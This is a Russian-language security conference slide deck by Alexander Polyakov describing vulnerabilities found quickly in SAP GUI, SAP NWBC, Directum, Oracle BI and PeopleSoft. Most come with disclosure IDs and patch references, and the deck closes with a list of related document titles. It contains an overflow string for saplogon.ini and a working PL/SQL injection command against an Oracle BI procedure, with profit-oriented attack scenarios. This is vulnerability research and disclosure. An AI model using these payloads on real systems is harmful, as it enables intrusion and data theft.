alexander polyakov - don’t touch it, unless it falls in pieces business applications hack in...

Не трогай,

а то развалится:

взлом бизнес приложений в экстремальных условиях

Александр Поляков

Технический Директор Digital Security

Множество бизнес приложений, которые хранят такие важные для вас данные,

совершенно не разрабатывались с учётом хоть каких-либо требований безопасной

разработки и тестирования.

Да, конечно, уязвимости есть везде, но не такие, и обнаружить их далеко не так

просто. Все уязвимости, представленные в данной презентации, были обнаружены

в течение 5 минут после запуска программы, мной и коллегами в свободное от

работы время, в самолёте, поезде или гостинице, когда нет интернета, нет

привычного окружения вроде фаззероф, снифферов и отладчиков или банального

интерпретатора perl, а есть только блокнот и установленный софт. Такое вот

небольшое руководство по поиску уязвимостей в экстремальных условиях на живых

примерах. Кто будет подопытным? Я думаю, вам знакомы эти имена: Documentum,

1C, SAP, PeopleSoft, Oracle BI. Время еще есть, список может и пополниться.

SAP - 74% компаний из Forbes 500

Пример 1: Ломаем SAPGUI

• Простая задача - найти уязвимость формата файлов.

• Цель: SAP Gui

• Тип : File format overflow

• Условия: Быстро

• Подходы:

• Ручной Fuzzing

• Автоматизированный Fuzzing

Saplogon.ini (конфигурационный файл) ~ 50 параметров

[Configuration]

SessManNewKey=4

[Description]

Item1=192.168.187.63

Item2=ECC5

Item3=solman

[Address]

Item1=

Item2=

Item3=

[MSSysName]

Item1=DM0

Item2=ERP

Item3=SM1

[MSSrvName]

Item1=

Item2=

Результат : DSECRG-11-017

[MSSysName]

Item1=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA1AAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA2AAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAA1AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA2A

AAAAAAAAAAAAAAAAAAAAAAAAAA1AAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAA2AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA1AAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA2AAAAAAAAAAAAAAAAA

AAAAAAAAAA1AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

A2AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAA1AAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAA2AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA1AAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA2AAAAAAAAAAAAAA

AAAAAAAAAAAAA1AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAA2AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA1AAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAA2AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA1AA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

0x41414141 and I don’t need anything more

Profit

• Файл входит в дистрибутив, распространяемый про сети

• Дистрибутив обычно лежит на файл-сервере

• Иногда даже с доступом на запись!

• Подмена файла и получение прав администратора на рабочих

станциях

• Далее все зависти от ваших желаний)

Результат : DSECRG-11-017 Автор – Дмитрий Частухин. Закрыто в обновлении: SapNote 1504547

Пример 2 Ломаем SAP NWBC (NetWeaver Business Client)

• Задача: скоротать время в самалёте

• Цель: SAP NWBC

• Тип : ActiveX overflow

• Условия: Comraider всегда с собой )

• Подходы:

• Fuzzing

Сдался

Profit

• Safe for scripting

• Эксплоит даёт удалённый шелл на атакуемом клиенте

• Спасибо Лёше Синцову

Результат : DSECRG-11-010 Автор – Александр Поляков + Алексей Синцов. Закрыто в обновлении: SapNote 1519966

DIRECTUM — система класса ECM (Enterprise Content Management),

обеспечивающая прозрачность управления компанией

и повышающая эффективность работы всех ее сотрудников.

Множество крупных клиентов: Сургутнефтегазбанк, Газпром

трансгаз Чайковcкий, Правительство Тюменской области, Парламент

Республики Калмыкия, "Региональный банк развития……………

Система документооборота Directum

• Задача: скоротать время в поезде москва-спб

• Цель: Directum ECM

• Уязвимость:

• Условия: рабочий ноутбук, блокнот

• Подходы:

• Анализ формата и ручной Fuzzing

Результат

• Уязвимость обнаружена

• Формат файла хранения документов

• Показать не могу (responsible disclose)

Все кому интересно предлагаю обсудить

проблемы разглашения уязвимостей на

панельной дискуссии.

Profit

• Файл с эксплоитом загружается в СЭД

• Доверие к системе гораздо выше, чем у левой ссылки по почте

• При открытии срабатывает эксплоит

• Удобно таргетировать

Результат : DSECRG-11-??? Автор – Александр Поляков Закрыто в обновлении: пока не закрыто

Неа не слышал?

Что хранится?

Пример 3: Oracle BI

• Ситуация: Гостиница в одном богом забытом городе

• Цель: Oracle BI внутренние процедуры СУБД

• Под рукой: время, Oracle Database PL/SQL Fuzzing Tool

• Подходы:

• Автоматизированный Fuzzing

Результат: после первого запуска порядка 10 потенциальных дыр

PL/SQL Injection in OWBREPOS_OWNER.WB_OLAP_AW_SET_SOLVE_ID

• Доступна на выполнение всем (Public)

• Запущена от роли OWBREPOS_OWNER.

• Доступны права:

• 1. SELECT ANY DICTIONARY

• 2. JAVA_ADMIN

• 3. CREATE EXTERNAL JOB

• 4 CREATE ANY DIRECTORY

• Не DBA, но зато может выполнять команды OC

Анализируем уязвимость

Запустим:

> exec OWBREPOS_OWNER.WB_OLAP_AW_SET_SOLVE_ID('bbbbbbbbbbb','ccccccccc','ddddd');

Прочтём логи:

> select sql_text from v$sql where sql_text like '%bbb%';

Результат логов:

> INSERT INTO OWB$$$_SOLVE_GROUP_IDS(CUBE_NAME, MEASURE_NAME, SOLVE_GROUP_ID)

VALUES('bbbbbbbbbbb', 'ccccccccc', 'ddddd')

Запускаем эксплоит:

>exec OWBREPOS_OWNER.WB_OLAP_AW_SET_SOLVE_ID('aaa''||SCOTT.SQLI()||''aaa','bbb','bbb');

Profit

• Полный доступ к ОС и чтение СУБД

• Качаем любые данные (к примеру финансовую отчётность)

• Идём играть на биржу

WARNING! Данные действия попадают

под целый ряд статуе УК РФ

Результат : DSECRG-11-020 Автор – Александр Поляков Закрыто в обновлении: CPU April 2011

система управления персоналом

Inurl:/psp/ps/?cmd=login

Переполнение в поле Password!

Основные проблемы безопасности систем ДБО

Пример 5: Oracle Peoplesoft

К сожалению только DOS

Основные проблемы безопасности систем ДБО

Результат : DSECRG-11-??? Автор – Андрей Лабунец Закрыто в обновлении: CPU April 2011

Итоги

• Мы постоянно в поисках уязвимостей это больше чем работа

• Бизнес приложения на данный момент имеют крайне низкий

уровень защищённости

• Данная область становится популярнее с каждым годом

• Профессионалы в дефиците

alexander polyakov - don’t touch it, unless it falls in pieces business applications hack in...

Documents

local polyakov loop domains and their fractality

deconfinement: renormalized polyakov loops ...

got citrix? hack it!got citrix? hack it!

leslie elab insider hack it till you make it. · leslie...

got citrix hack it

how hard is it to hack a pc

hack your bedroom – interactive piano wall art · hack...

can you hack it? validating predictors for it boot camps

debug it-python-hack-a-thon-2011.02

diy / do-it-yourself workshop hack your...

hack the hack vivatech

hack the hack

hack it forward - ioactive€¦ · hack it forward better...

it transformation and the civic hack

got citrix? hack it!got citrix? hack it! · got citrix?...

hack it 'til you make it: acing the technical interview

migdal polyakov

hack any teachers homework plan and change it

semiconductors made simple polyakov

eric polyakov - portfolio 2016 web